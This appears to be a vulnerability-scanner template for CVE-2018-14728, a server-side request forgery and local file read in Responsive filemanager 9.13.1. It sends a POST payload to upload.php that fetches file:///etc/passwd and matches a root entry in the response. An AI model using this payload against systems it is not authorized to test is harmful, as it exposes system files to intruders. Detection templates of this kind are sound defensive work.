id: CVE-2018-14728 info: name: Responsive filemanager 9.13.1 - SSRF/LFI author: madrobot severity: high tags: cve,cve2018,ssrf,lfi requests: - method: POST path: - "{{BaseURL}}/filemanager/upload.php" body: "fldr=&url=file:///etc/passwd" matchers: - type: regex regex: - "root:[x*]:0:0:" part: body